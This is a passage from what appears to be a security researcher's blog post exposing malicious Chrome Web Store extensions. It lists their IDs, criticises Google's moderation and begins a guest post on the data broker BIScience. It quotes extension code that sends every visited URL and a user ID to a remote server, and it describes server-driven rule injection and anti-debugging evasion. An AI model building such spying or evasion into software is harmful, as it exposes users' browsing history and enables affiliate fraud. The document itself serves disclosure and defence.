| Dopni - Automatic Cashback Service | 19 | ekafoahfmdgaeefeeneiijbehnbocbij | |
| SkipAds Plus | 95 | emnhnjiiloghpnekjifmoimflkdmjhgp | |
| 1-Click Color Picker: Instant Eyedropper (hex, rgb, hsl) | 10,000 | fmpgmcidlaojgncjlhjkhfbjchafcfoe | |
| Better Color Picker - pick any color in Chrome | 10,000 | gpibachbddnihfkbjcfggbejjgjdijeb | |
| Easy Dark Mode | 869 | ibbkokjdcfjakihkpihlffljabiepdag | |
| Manuals Viewer | 101 | ieihbaicbgpebhkfebnfkdhkpdemljfb | |
| ScreenCapX - Full Page Screenshot | 20,000 | ihfedmikeegmkebekpjflhnlmfbafbfe | |
| Capture It - Easy Screenshot Tool (Full Page, Selected, Visible Area) | 48 | lkalpedlpidbenfnnldoboegepndcddk | |
| AdBlock - Ads and Youtube | 641 | nonajfcfdpeheinkafjiefpdhfalffof | |
| Manual Finder 2024 | 280 | ocbfgbpocngolfigkhfehckgeihdhgll | |
| Volume Booster - Super Sound Booster | 8,000 | ojkoofedgcdebdnajjeodlooojdphnlj | |
| Font Expert: Identify Fonts from Images & Websites | 666 | pjlheckmodimboibhpdcgkpkbpjfhooe |
The following table also lists the extensions officially developed by Damiko Inc. With these, there is no indication of malicious intent, yet all but the last one share similarities with Phoenix Invicta extensions above and remove security headers.
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| Screen Recorder | 685 | bgnpgpfjdpmgfdegmmjdbppccdhjhdpe | |
| Halloween backgrounds and stickers for video calls and chats | 31 | fklkhoeemdncdhacelfjeaajhfhoenaa | |
| AI Webcam Effects + Recorder: Google Meet, Zoom, Discord & Other Meetings | 46 | iedbphhbpflhgpihkcceocomcdnemcbj | ✓ |
| Beauty Filter | 136 | mleflnbfifngdmiknggikhfmjjmioofi | |
| Background Noise Remover | 363 | njmhcidcdbaannpafjdljminaigdgolj | |
| Camera Picture In Picture (PIP Overlay) | 576 | pgejmpeimhjncennkkddmdknpgfblbcl |
Back in 2023 I pointed out that “Adblock all advertisements” is malicious and spying on its users. A year earlier McAfee already called out a bunch of extensions as malicious. For whatever reason, Google decided to let Adblock all advertisements stay, and three extensions from the McAfee article also remained in Chrome Web Store: Netflix Party, FlipShope and AutoBuy Flash Sales. Out of these three, Netflix Party and AutoBuy Flash Sales still (or again) contain malicious functionality.
Update (2025-01-28): This article originally claimed that FlipShope extension was also malicious and listed this extension cluster under the name of its developing company, Technosense Media. This was incorrect, the extension merely contained some recognizable but dead code. According to Technosense Media, they bought the extension in 2023. Presumably, the problematic code was introduced by the previous extension owner and is unused.
Coming back to Adblock all advertisements, it is still clearly spying on its users, using ad blocking functionality as a pretense to send the address of each page visited to its server (code slightly simplified for readability):
chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
if ("complete" === changeInfo.status) {
let params = {
url: tab.url,
userId: await chrome.storage.sync.get("userId")
};
const response = await fetch("https://smartadblocker.com/extension/rules/api", {
method: "POST",
credentials: "include",
headers: { "Content-Type": "application/json" },
body: JSON.stringify(params)
});
const rules = await response.json();
…
}
});
Supposedly, this code downloads a set of site-specific rules. This could in theory be legitimate functionality not meant to spy on users. That it isn’t legitimate functionality here isn’t indicated merely by the fact that the endpoint doesn’t produce any really meaningful responses. Legitimate functionality not intending to spy wouldn’t send a unique user ID with the request, the page address would be cut down to the host name (or would at least have all parameters removed) and the response would be cached. The latter would happen simply to reduce the load on this endpoint, something that anybody does unless the endpoint is paid for with users’ data.
Nothing about the section above is new, I’ve already written as much in 2023. But either I haven’t taken a close look at the rule processing back then or it got considerably worse. Here is what it looks like today (variable and function naming is mine, the code was minified):
for (const key in rules)
if ("id" === key || "genericId" === key)
// Remove elements by ID
else if ("class" === key || "genericClass" === key)
// Remove elements by class name
else if ("innerText" === key)
// Remove elements by text
else if ("rules" === key)
if (rules.updateRules)
applyRules(rules[key], rules.rule_scope, tabId);
else if ("cc" === key)
// Bogus logic to let the server decide which language-specific filter list
// should be enabled
The interesting part here is the applyRules call which conveniently isn’t triggered by the initial server responses (updateRules key is set to false). This function looks roughly like this:
async function applyRules(rules, scope, tabId) {
if ("global" !== scope) {
if (0 !== rules.length) {
const existingRules = await chrome.declarativeNetRequest.getDynamicRules();
const ruleIds = existingRules.map(rule => rule.id);
chrome.declarativeNetRequest.updateDynamicRules({
removeRuleIds: ruleIds,
addRules: rules
});
}
} else {
chrome.tabs.sendMessage(tabId, {
message: "start",
link: rules
});
}
}
So if the “scope” is anything but "global" the rules provided by the server will be added to the declarativeNetRequest API. Modifying these rules on per-request basis makes no sense for ad blocking, but it opens up rich possibilities for abuse as we’ve seen already. Given what McAfee discovered about these extensions before this is likely meant for cookie stuffing, yet execution of arbitrary JavaScript code in the context of targeted web pages is also a possible scenario.
And if the “scope” is "global" the extension sends a message to its content script which will inject a frame with the given address into the page. Again, this makes no sense whatsoever for blocking ads, but it definitely works for affiliate fraud – which is what these extensions are all about according to McAfee.
Depending on the extension there might be only frame injection or only adding of dynamic rules. Given the purpose of the AutoBuy extension, it can probably pass as legitimate by Google’s rules, others not so much.
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| Auto Refresh Plus | 100,000 | ffejlioijcokmblckiijnjcmfidjppdn | |
| Smart Auto Refresh | 100,000 | fkjngjgmgbfelejhbjblhjkehchifpcj | ✓ |
| Adblock all advertisement - No Ads extension | 700,000 | gbdjcgalliefpinpmggefbloehmmknca | ✓ |
| AutoBuy Flash Sales, Deals, and Coupons | 20,000 | gbnahglfafmhaehbdmjedfhdmimjcbed | |
| Autoskip for Youtube™ Ads | 200,000 | hmbnhhcgiecenbbkgdoaoafjpeaboine | |
| Smart Adblocker | 50,000 | iojpcjjdfhlcbgjnpngcmaojmlokmeii | ✓ |
| Adblock for Browser | 10,000 | jcbjcocinigpbgfpnhlpagidbmlngnnn | |
| Netflix Party | 500,000 | mmnbenehknklpbendgmgngeaignppnbe | |
| Free adblocker | 8,000 | njjbfkooniaeodkimaidbpginjcmhmbm | ✓ |
| Video Ad Block Youtube | 100,000 | okepkpmjhegbhmnnondmminfgfbjddpb | ✓ |
| Picture in Picture for Videos | 30,000 | pmdjjeplkafhkdjebfaoaljknbmilfgo |
Update (2025-01-28): Added Auto Refresh Plus and Picture in Picture for Videos to the list. The former only contains the spying functionality, the latter spying and frame injection.
I’ll be looking at Sweet VPN as representative for 32 extensions I found using highly obfuscated code. These extensions aren’t exactly new to this blog either, my post in 2023 already named three of them even though I couldn’t identify the malicious functionality back then. Most likely I simply overlooked it, I didn’t have time to investigate each extension thoroughly.
These extensions also decided to circumvent remote code restrictions but their approach is way more elaborate. They download some JSON data from the server and add it to the extension’s storage. While some keys like proxy_list are expected here and always present, a number of others are absent from the server response when the extension is first installed. These can contain malicious instructions.
For example, the four keys 0, 1, 2, 3 seem to be meant for anti-debugging protection. If present, the values of these keys are concatenated and parsed as JSON into an array. A property resolution mechanism then allows resolving arbitrarily deep values, starting at the self object of the extension’s background worker. The result are three values which are used like this:
value1({value2: value3}, result => {
…
});
This call is repeated every three seconds. If result is a non-empty array, the extension removes all but a few storage keys and stops further checks. This is clearly meant to remove traces of malicious activity. I am not aware of any ways for an extension to detect an open Developer Tools window, so this call is probably meant to detect the extension management page that Developer Tools are opened from:
chrome.tabs.query({"url": "chrome://extensions/*"}, result => {
…
});
This protection mechanism is only a very small part of the obfuscated logic in the extension. There are lots of values being decoded, tossed around, used in some function calls. It is difficult to reconstruct the logic with the key parts missing. However, the extension doesn’t have too many permissions:
"permissions": [
"proxy",
"storage",
"tabs"
],
"host_permissions": [
"https://ipapi.co/json/",
"https://ip.seeip.org/geoip",
"https://api.myip.com/",
"https://ifconfig.co/json"
],
Given that almost no websites can be accessed directly, it’s a safe bet that the purpose of the concealed functionality is spying on the users. That’s what the tabs permission is for, to be notified of any changes in the user’s browsing session.
In fact, once you know that the function being passed as parameter is a tabs.onUpdated listener its logic becomes way easier to understand, despite the missing parts. So the cl key in the extension’s storage (other extensions often use other names) is the event queue where data about the user’s browsing is being stored. Once there are at least 10 events the queue is sent to the same address where the extension downloads its configuration from.
There are also some chrome.tabs.update() calls in the code, replacing the address of the currently loading page by something else. It’s hard to be certain what these are used for: it could be search redirection, affiliate fraud or plainly navigating to advertising pages.
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| VK UnBlock. Works fast. | 40,000 | ahdigjdpekdcpbajihncondbplelbcmo | |
| VPN Proxy Master | 120 | akkjhhdlbfibjcfnmkmcaknbmmbngkgn | |
| VPN Unblocker for Instagram | 8,000 | akmlnidakeiaipibeaidhlekfkjamgkm | |
| StoriesHub | 100,000 | angjmncdicjedpjcapomhnjeinkhdddf | ✓ |
| Facebook and Instagram Downloader | 30,000 | baajncdfffcpahjjmhhnhflmbelpbpli | |
| Downloader for Instagram - ToolMaster | 100,000 | bgbclojjlpkimdhhdhbmbgpkaenfmkoe | ✓ |
| TikTok in USA | 20,000 | bgcmndidjhfimbbocplkapiaaokhlcac | ✓ |
| Sweet VPN | 100,000 | bojaonpikbbgeijomodbogeiebkckkoi | ✓ |
| Access to Odnoklassniki | 4,000 | ccaieagllbdljoabpdjiafjedojoejcl | |
| Ghost - Anonymous Stories for Instagram | 20,000 | cdpeckclhmpcancbdihdfnfcncafaicp | ✓ |
| StorySpace Manager for FB and IG Stories | 10,000 | cicohiknlppcipjbfpoghjbncojncjgb | ✓ |
| VPN Unblocker for YouTube | 40,000 | cnodohbngpblpllnokiijcpnepdmfkgm | |
| Universal Video Downloader | 200,000 | cogmkaeijeflocngklepoknelfjpdjng | ✓ |
| Free privacy connection - VPN guru | 500,000 | dcaffjpclkkjfacgfofgpjbmgjnjlpmh | ✓ |
| Live Recorder for Instagram aka MasterReco | 10,000 | djngbdfelbifdjcoclafcdhpamhmeamj | |
| Video Downloader for Vimeo | 100,000 | dkiipfbcepndfilijijlacffnlbchigb | ✓ |
| VPN Ultimate - Best VPN by unblock | 400,000 | epeigjgefhajkiiallmfblgglmdbhfab | ✓ |
| Insured Smart VPN - Best Proxy ever unblock everything | 2,000 | idoimknkimlgjadphdkmgocgpbkjfoch | |
| Ultra Downloader for Instagram | 30,000 | inekcncapjijgfjjlkadkmdgfoekcilb | ✓ |
| Parental Control. Blocks porn, malware, etc. | 3,000 | iohpehejkbkfdgpfhmlbogapmpkefdej | ✓ |
| UlV. Ultimate downloader for Vimeo | 2,000 | jpoobmnmkchgfckdlbgboeaojhgopidn | |
| Simplify. Downloader for Instagram | 20,000 | kceofhgmmjgfmnepogjifiomgojpmhep | ✓ |
| Download Facebook Video | 591 | kdemfcffpjfikmpmfllaehabkgkeakak | |
| VPN Unblocker for Facebook | 3,000 | kheajjdamndeonfpjchdmkpjlemlbkma | |
| Video Downloader for FaceBook | 90,000 | kjnmedaeobfmoehceokbmpamheibpdjj | ✓ |
| TikTok Video Keeper | 40,000 | kmobjdioiclamniofdnngmafbhgcniok | ✓ |
| Mass Downloader for Instagram | 100,000 | ldoldiahbhnbfdihknppjbhgjngibdbe | ✓ |
| Stories for FaceBook - Anon view, download | 3,000 | nfimgoaflmkihgkfoplaekifpeicacdn | ✓ |
| VPN Surf - Fast VPN by unblock | 800,000 | nhnfcgpcbfclhfafjlooihdfghaeinfc | ✓ |
| TikTok Video Downloader | 20,000 | oaceepljpkcbcgccnmlepeofkhplkbih | |
| Video Downloader for FaceBook | 10,000 | ododgdnipimbpbfioijikckkgkbkginh | |
| Exta: Pro downloader for Instagram | 10,000 | ppcmpaldbkcoeiepfbkdahoaepnoacgd | ✓ |
Update (2025-01-20): Added Adblock Bear and AdBlock 360 after a hint from a commenter.
As is often the case with Chrome Web Store, my searches regularly turned up more malicious extensions unrelated to the ones I was looking for. Some of them also devised their mechanisms to execute remote code. I didn’t find more extensions using the same approach, which of course doesn’t mean that there are none.
Adblock for Youtube is yet another browser extension essentially bundling an interpreter for their very own minimalistic programming language. One part of the instructions it receives from its server is executed in the context of the privileged background worker, the other in the content script context.
EasyNav, Adblock Bear and AdBlock 360 use an approach quite similar to Phoenix Invicta. In particular, they add rules to the declarativeNetRequest API that they receive from their respective server. EasyNav also removes security headers. These extensions don’t bother with HTML injection however, instead their server produces a list of scripts to be injected into web pages. There are specific scripts for some domains and a fallback for everything else.
Download Manager Integration Checklist is merely supposed to display some instructions, it shouldn’t need any privileges at all. Yet this extension requests access to all web pages and will add rules to the declarativeNetRequest API that it downloads from its server.
Translator makes it look like its configuration is all about downloading a list of languages. But it also contains a regular expression to test against website addresses and the instructions on what to do with matching websites: a tag name of the element to create and a bunch of attributes to set. Given that the element isn’t removed after insertion, this is probably about injecting advertising frames. This mechanism could just as well be used to inject a script however.
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| Adblock for Youtube™ - Auto Skip ad | 8,000 | anceggghekdpfkjihcojnlijcocgmaoo | ✓ |
| EasyNav | 30,000 | aobeidoiagedbcogakfipippifjheaom | |
| Adblock Bear - stop invasive ads | 100,000 | gdiknemhndplpgnnnjjjhphhembfojec | |
| AdBlock 360 | 400,000 | ghfkgecdjkmgjkhbdpjdhimeleinmmkl | |
| Download Manager Integration Checklist | 70,000 | ghkcpcihdonjljjddkmjccibagkjohpi | ✓ |
| Translator | 100,000 | icchadngbpkcegnabnabhkjkfkfflmpj |
The following domain names are associated with Phoenix Invicta:
The following domain names are used by Netflix Party and related extensions:
The following domain names are used by Sweet VPN and related extensions:
These domain names are used by the extensions in the bonus section:
Let’s make one thing clear first: I’m not singling out Google’s handling of problematic and malicious browser extensions because it is worse than Microsoft’s for example. No, Microsoft is probably even worse but I never bothered finding out. That’s because Microsoft Edge doesn’t matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe?
Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required” approach towards moderating Chrome Web Store. Their attempts to automate all things moderation do little to deter malicious actors, all while creating considerable issues for authors of legitimate add-ons. Even when reports reach Google’s human moderation team, the actions taken are inconsistent, and Google generally shies away from taking decisive actions against established businesses.
As a result, for a decade my recommendation for Chrome users has been to stay away from Chrome Web Store if possible. Whenever extensions are absolutely necessary, it should be known who is developing them, why, and how the development is being funded. Just installing some extension from Chrome Web Store, including those recommended by Google or “featured,” is very likely to result in your browsing data being sold or worse.
Google employees will certainly disagree with me. Sadly, much of it is organizational blindness. I am certain that you meant it well and that you did many innovative things to make it work. But looking at it from the outside, it’s the result that matters. And for the end users the result is a huge (and rather dangerous) mess.
Five years ago I discovered that Avast browser extensions were spying on their users. Mozilla and Opera disabled the extension listings immediately after I reported it to them. Google on the other hand took two weeks where they supposedly discussed their policies internally. The result of that discussion was eventually their “no surprises” policy:
Building and maintaining user trust in the Chrome Web Store is paramount, which means we set a high bar for developer transparency. All functionalities of extensions should be clearly disclosed to the user, with no surprises. This means we will remove extensions which appear to deceive or mislead users, enable dishonest behavior, or utilize clickbaity functionality to artificially grow their distribution.
So when dishonest behavior from extensions is reported today, Google should act immediately and decisively, right? Let’s take a look at two examples that came up in the past few months.
In October I wrote about the refoorest extension deceiving its users. I could conclusively prove that Colibri Hero, the company behind refoorest, deceives their users on the number of trees they supposedly plant, incentivizing users into installing with empty promises. In fact, there is strong indication that the company never even donated for planting trees beyond a rather modest one-time donation.
Google got my report and dealt with it. What kind of action did they take? That’s a very good question that Google won’t answer. But refoorest is still available from Chrome Web Store, it is still “featured” and it still advertises the very same completely made up numbers of trees they supposedly planted. Google even advertises for the extension, listing it in the “Editors’ Picks extensions” collection, probably the reason why it gained some users since my report. So much about being honest. For comparison: refoorest used to be available from Firefox Add-ons as well but was already removed when I started my investigation. Opera removed the extension from their add-on store within hours of my report.
But maybe that issue wasn’t serious enough? After all, there is no harm done to users if the company is simply pocketing the money they claim to spend on a good cause. So also in October I wrote about the Karma extension spying on users. Users are not being notified about their browsing data being collected and sold, except for a note buried in their privacy policy. Certainly, that’s identical to the Avast case mentioned before and the extension needs to be taken down to protect users?
Again, Google got my report and dealt with it. And again I fail to see any result of their action. The Karma extension remains available on Chrome Web Store unchanged, it will still notify their server about every web page you visit (see screenshot above). The users still aren’t informed about this. Yet their Chrome Web Store page continues to claim “This developer declares that your data is not being sold to third parties, outside of the approved use cases,” a statement contradicted by their privacy policy. The extension appears to have lost its “Featured” badge at some point but now it is back.
Note: Of course Karma isn’t the only data broker that Google tolerates in Chrome Web Store. I published a guest article today by a researcher who didn’t want to disclose their identity, explaining their experience with BIScience Ltd., a company misleading millions of extension users to collect and sell their browsing data. This post also explains how Google’s “approved use cases” effectively allow pretty much any abuse of users’ data.
Mind you, neither refoorest nor Karma were alone but rather recruited or bought other browser extensions as well. These other browser extensions were turned outright malicious, with stealth functionality to perform affiliate fraud and/or collect users’ browsing history. Google’s reaction was very inconsistent here. While most extensions affiliated with Karma were removed from Chrome Web Store, the extension with the highest user numbers (and performing affiliate fraud without telling their users) was allowed to remain for some reason.
With refoorest, most affiliate extensions were removed or stopped using their Impact Hero SDK. Yet when I checked more than two months after my report two extensions from my original list still appeared to include that hidden affiliate fraud functionality and I found seven new ones that Google apparently didn’t notice.
Now you may be wondering: if I reported these issues, why do I have to guess what Google did in response to my reports? Actually, keeping me in the dark is Google’s official policy:
This is by the way the response I received in November after pointing out the inconsistent treatment of the extensions. A month later the state of affairs was still that some malicious extensions got removed while other extensions with identical functionality were available for users to install, and I have no idea why that is. I’ve heard before that Google employees aren’t allowed to discuss enforcement actions, and your guess is as good as mine as to whom this policy is supposed to protect.
Supposedly, the idea of not commenting on policy enforcement actions is hiding the internal decision making from bad actors, so that they don’t know how to game the process. If that’s the theory however, it isn’t working. In this particular case the bad actors got some feedback, be it through their extensions being removed or due to the adjustments demanded by Google. It’s only me, the reporter of these issues, who needs to be guessing.
But, and this is a positive development, I’ve received a confirmation that both these reports are being worked on. This is more than I usually get from Google which is: silence. And typically also no visible reaction either, at least until a report starts circulating in media publications forcing Google to act on it.
But let’s take a step back and ask ourselves: how does one report Chrome Web Store policy violations? Given how much Google emphasizes their policies, there should be an obvious way?
In fact, there is a support document on reporting issues. And when I started asking around, even Google employees would direct me to it.
If you find something in the Chrome Web Store that violates the Chrome Web Store Terms of Service, or trademark or copyright infringement, let us know.
Sounds good, right? Except that the first option says:
At the bottom left of the window, click Flag Issue.
Ok, that’s clearly the old Chrome Web Store. But we understand of course that they mean the “Flag concern” link which is nowhere near the bottom. And it gives us the following selection:
This doesn’t really seem like the place to report policy violations. Even “Felt suspicious” isn’t right for an issue you can prove. And, unsurprisingly, after choosing this option Google just responds with:
Your abuse report has been submitted successfully.
No way to provide any details. No asking for my contact details in case they have questions. No context whatsoever, merely “felt suspicious.” This is probably fed to some algorithm somewhere which might result in… what actually? Judging by malicious extensions where users have been vocally complaining, often for years: nothing whatsoever. This isn’t the way.
Well, there is another option listed in the document:
If you think an item in the Chrome Web Store violates a copyright or trademark, fill out this form.
Yes, Google seems to care about copyright and trademark violations, but a policy violation isn’t that. If we try the form nevertheless it gives us a promising selection:
Finally! Yes, policy reasons are exactly what we are after, let’s click that. And there comes another choice:
That’s really the only option offered. And I have questions. At the very least those are: in what jurisdiction is child sexual abuse material a non-legal reason to report content? And: since when is that the only policy that Chrome Web Store has?
We can go back and try “Legal Reasons to Report Content” of course but the options available are really legal issues: intellectual properties, court orders or violations of hate speech law. This is another dead end.
It took me a lot of asking around to learn that the real (and well-hidden) way to report Chrome Web Store policy violations is Chrome Web Store One Stop Support. I mean: I get it that Google must be getting lots of non-sense reports. And they probably want to limit that flood somehow. But making legitimate reports almost impossible can’t really be the way.
In 2019 Google launched the Developer Data Protection Reward Program (DDPRP) meant to address privacy violations in Chrome extensions. Its participation conditions were rather narrow for my taste, pretty much no issue would qualify for the program. But at least it was a reliable way to report issues which might even get forwarded internally. Unfortunately, Google discontinued this program in August 2024.
It’s not that I am very convinced of DDPRP’s performance. I’ve used that program twice. First time I reported Keepa’s data exfiltration. DDPRP paid me an award for the report but, from what I could tell, allowed the extension to continue unchanged. The second report was about the malicious PDF Toolbox extension. The report was deemed out of scope for the program but forwarded internally. The extension was then removed quickly, but that might have been due to the media coverage. The benefit of the program was really: it was a documented way of reaching a human being at Google that would look at a problematic extension.
In theory, there should be no spam on Chrome Web Store. The policy is quite clear on that:
We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.
Unfortunately, this policy’s enforcement is lax at best. Back in June 2023 I wrote about a malicious cluster of Chrome extensions. I listed 108 extensions belonging to this cluster, pointing out their spamming in particular:
Well, 13 almost identical video downloaders, 9 almost identical volume boosters, 9 almost identical translation extensions, 5 almost identical screen recorders are definitely not providing value.
I’ve also documented the outright malicious extensions in this cluster, pointing out that other extensions are likely to turn malicious as well once they have sufficient users. And how did Google respond? The malicious extensions have been removed, yes. But other than that, 96 extensions from my original list remained active in January 2025, and there were of course more extensions that my original report didn’t list. For whatever reason, Google chose not to enforce their anti-spam policy against them.
And that’s merely one example. My most recent blog post documented 920 extensions using tricks to spam Chrome Web Store, most of them belonging to a few large extension clusters. As it turned out, Google was made aware of this particular trick a year before my blog post already. And again, for some reason Google chose not to act.
So when you search for extensions in Chrome Web Store, many results will likely come from one of the spam clusters. But the choice to install a particular extension is typically based on reviews. Can at least these reviews be trusted? Concerning moderation of reviews Google says:
Google doesn’t verify the authenticity of reviews and ratings, but reviews that violate our terms of service will be removed.
And the important part in the terms of service is:
Your reviews should reflect the experience you’ve had with the content or service you’re reviewing. Do not post fake or inaccurate reviews, the same review multiple times, reviews for the same content from multiple accounts, reviews to mislead other users or manipulate the rating, or reviews on behalf of others. Do not misrepresent your identity or your affiliation to the content you’re reviewing.
Now you may be wondering how well these rules are being enforced. The obviously fake review on the Karma extension is still there, three months after being posted. Not that it matters, with their continuous stream of incoming five star reviews.
A month ago I reported an extension to Google that, despite having merely 10,000 users, received 19 five star reviews on a single day in September – and only a single (negative) review since then. I pointed out that it is a consistent pattern across all extensions of this account, e.g. another extension (merely 30 users) received 9 five star reviews on the same day. It really doesn’t get any more obvious than that. Yet all these reviews are still online.
And it isn’t only fake reviews. The refoorest extension incentivizes reviews which violates Google’s anti-spam policy (emphasis mine):
Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store. This includes, but is not limited to, inflating product ratings, reviews, or install counts by illegitimate means, such as fraudulent or incentivized downloads, reviews and ratings.
It has been three months, and they are still allowed to continue. The extension gets a massive amount of overwhelmingly positive reviews, users get their fake trees, everybody is happy. Well, other than the people trying to make sense of these meaningless reviews.
With reviews being so easy to game, it looks like lots of extensions are doing it. Sometimes it shows as a clearly inflated review count, sometimes it’s the overwhelmingly positive or meaningless content. At this point, any user ratings with the average above 4 stars likely have been messed with.
But at least the “Featured” badge is meaningful, right? It certainly sounds like somebody at Google reviewed the extension and considered it worthy of carrying the badge. At least Google’s announcement indeed suggests a manual review:
Chrome team members manually evaluate each extension before it receives the badge, paying special attention to the following:
- Adherence to Chrome Web Store’s best practices guidelines, including providing an enjoyable and intuitive experience, using the latest platform APIs and respecting the privacy of end-users.
- A store listing page that is clear and helpful for users, with quality images and a detailed description.
Yet looking through 920 spammy extensions I reported recently, most of them carry the “Featured” badge. Yes, even the endless copies of video downloaders, volume boosters, AI assistants, translators and such. If there is an actual manual review of these extensions as Google claims, it cannot really be thorough.
To provide a more tangible example, Chrome Web Store currently has Blaze VPN, Safum VPN and Snap VPN extensions carry the “Featured” badge. These extensions (along with Ishaan VPN which has barely any users) belong to the PDF Toolbox cluster which produced malicious extensions in the past. A cursory code inspection reveals that all four are identical and in fact clones of Nucleus VPN which was removed from Chrome Web Store in 2021. And they also don’t even work, no connections succeed. The extension not working is something users of Nucleus VPN complained about already, a fact that the extension compensated with fake reviews.
So it looks like the main criteria for awarding the “Featured” badge are the things which can be easily verified automatically: user count, Manifest V3, claims to respect privacy (not even the privacy policy, merely that the right checkbox was checked), a Chrome Web Store listing with all the necessary promotional images. Given how many such extensions are plainly broken, the requirements on the user interface and generally extension quality don’t seem to be too high. And providing unique functionality definitely isn’t on the list of criteria.
In other words: if you are a Chrome user, the “Featured” badge is completely meaningless. It is no guarantee that the extension isn’t malicious, not even an indication. In fact, authors of malicious extensions will invest some extra effort to get this badge. That’s because the website algorithm seems to weigh the badge considerably towards the extension’s ranking.
Google Chrome first introduced browser extensions in 2011. At that point the dominant browser extensions ecosystem was Mozilla’s, having been around for 12 years already. Mozilla’s extensions suffered from a number of issues that Chrome developers noticed of course: essentially unrestricted privileges necessitated very thorough reviews before extensions could be published on Mozilla Add-ons website, due to high damage potential of the extensions (both intentional and unintentional). And since these reviews relied largely on volunteers, they often took a long time, with the publication delays being very frustrating to add-on developers.
Disclaimer: I was a reviewer on Mozilla Add-ons myself between 2015 and 2017.
Google Chrome was meant to address all these issues. It pioneered sandboxed extensions which allowed limiting extension privileges. And Chrome Web Store focused on automated reviews from the very start, relying on heuristics to detect problematic behavior in extensions, so that manual reviews would only be necessary occasionally and after the extension was already published. Eventually, market pressure forced Mozilla to adopt largely the same approaches.
Google’s over-reliance on automated tools caused issues from the very start, and it certainly didn’t get any better with the increased popularity of the browser. Mozilla accumulated a set of rules to make manual reviews possible, e.g. all code should be contained in the extension, so no downloading of extension code from web servers. Also, reviewers had to be provided with an unobfuscated and unminified version of the source code. Google didn’t consider any of this necessary for their automated review systems. So when automated review failed, manual review was often very hard or even impossible.
It’s only with the introduction of Manifest V3 now that Chrome finally prohibits remote hosted code. And it took until 2018 to prohibit code obfuscation, while Google’s reviewers still have to reverse minification for manual reviews. Mind you, we are talking about policies that were already long established at Mozilla when Google entered the market in 2011.
And extension sandboxing, while without doubt useful, didn’t really solve the issue of malicious extensions. I already wrote about one issue back in 2016:
The problem is: useful extensions will usually request this kind of “give me the keys to the kingdom” permission.
Essentially, this renders permission prompts useless. Users cannot possibly tell whether an extension has valid reasons to request extensive privileges. So legitimate extensions have to constantly deal with users who are confused about why the extension needs to “read and change all your data on all websites.” At the same time, users are trained to accept such prompts without thinking twice.
And then malicious add-ons come along, requesting extensive privileges under a pretense. Monetization companies put out guides for extension developers on how they can request more privileges for their extensions while fending off complains from users and Google alike. There is a lot of this going on in Chrome Web Store, and Manifest V3 couldn’t change anything about it.
So what we have now is:
Number 3 and 4 in particular seem to further trap Google in the “it needs to be automated” mindset. Yet adding more automated layers isn’t going to solve the issue when there are companies which can put a hundred employees on devising new tricks to avoid triggering detection. Yes, malicious extensions are big business.
If Google were interested in making Chrome Web Store a safer place, I don’t think there is a way around investing considerable (manual) effort into cleaning up the place. Taking down a single extension won’t really hurt the malicious actors, they have hundreds of other extensions in the pipeline. Tracing the relationships between extensions on the other hand and taking down the entire cluster – that would change things.
As the saying goes, the best time to do this was a decade ago. The second best time is right now, when Chrome Web Store with its somewhat less than 150,000 extensions is certainly large but not yet large enough to make manual investigations impossible. Besides, there is probably little point in investigating abandoned extensions (latest release more than two years ago) which make up almost 60% of Chrome Web Store.
But so far Google’s actions have been entirely reactive, typically limited to extensions which already caused considerable damage. I don’t know whether they actually want to stay on top of this. From the business point of view there is probably little reason for that. After all, Google Chrome no longer has to compete for market share, having essentially won against the competition. Even with Chrome extensions not being usable, Chrome will likely stay the dominant browser.
In fact, Google has significant incentives to keep a particular class of extensions low, so one might even suspect intention behind allowing Chrome Web Store to be flooded with shady and outright malicious ad blockers.
Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors.
This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years.
BIScience is a long-established data broker that owns multiple extensions in the Chrome Web Store (CWS) that collect clickstream data under false pretenses. They also provide a software development kit (SDK) to partner third-party extension developers to collect and sell clickstream data from users, again under false pretenses. This SDK will send data to sclpfybn.com and other endpoints controlled by BIScience.
“Clickstream data” is an analytics industry term for “browsing history”. It consists of every URL users visit as they browse the web.
According to their website, BIScience “provides the deepest digital & behavioral data intelligence to market research companies, brands, publishers & investment firms”. They sell clickstream data through their Clickstream OS product and sell derived data under other product names.
BIScience owns AdClarity. They provide “advertising intelligence” for companies to monitor competitors. In other words, they have a large database of ads observed across the web. They use data collected from services operated by BIScience and third parties they partner with.
BIScience also owns Urban Cyber Security. They provide VPN, ad blocking, and safe browsing services under various names: Urban VPN, 1ClickVPN, Urban Browser Guard, Urban Safe Browsing, and Urban Ad Blocker. Urban collects user browsing history from these services, which is then sold by BIScience to third parties through Clickstream OS, AdClarity, and other products.
BIScience also owned GeoSurf, a residential proxy service that shut down in December 2023.
BIScience is a huge player in the browser extension ecosystem, based on their own claims and our observed activity. They also collect data from other sources, including Windows apps and Android apps that spy on other running apps.
The websites of BIScience and AdClarity make the following claims:
These numbers are the most recent figures from all pages on their websites, not only the home pages. They have consistently risen over the years based on archived website data, so it’s safe to say any lower figures on their website are outdated.
BIScience proactively contacts extension developers to buy clickstream data. They claim to buy this data in anonymized form, and in a manner compliant with Chrome Web Store policies. Both claims are demonstrably false.
Several third-party extensions integrate with BIScience’s SDK. Some are listed in the Secure Annex blog post, and we have identified more in the IOCs section. There are additional extensions which use their own custom endpoint on their own domain, making it more difficult to identify their sale of user data to BIScience and potentially other data brokers. Secure Annex identifies October 2023 as the earliest known date of BIScience integrations. Our evidence points to 2019 or earlier.
Our internal data shows the Visual Effects for Google Meet extension and other extensions collecting data since at least mid-2022. BIScience has likely been collecting data from extensions since 2019 or earlier, based on public GitHub posts by BIScience representatives (2021, 2021, 2022) and the 2019 DataSpii research that found some references to AdClarity in extensions. BIScience was founded in 2009 when they launched GeoSurf. They later launched AdClarity in 2012.
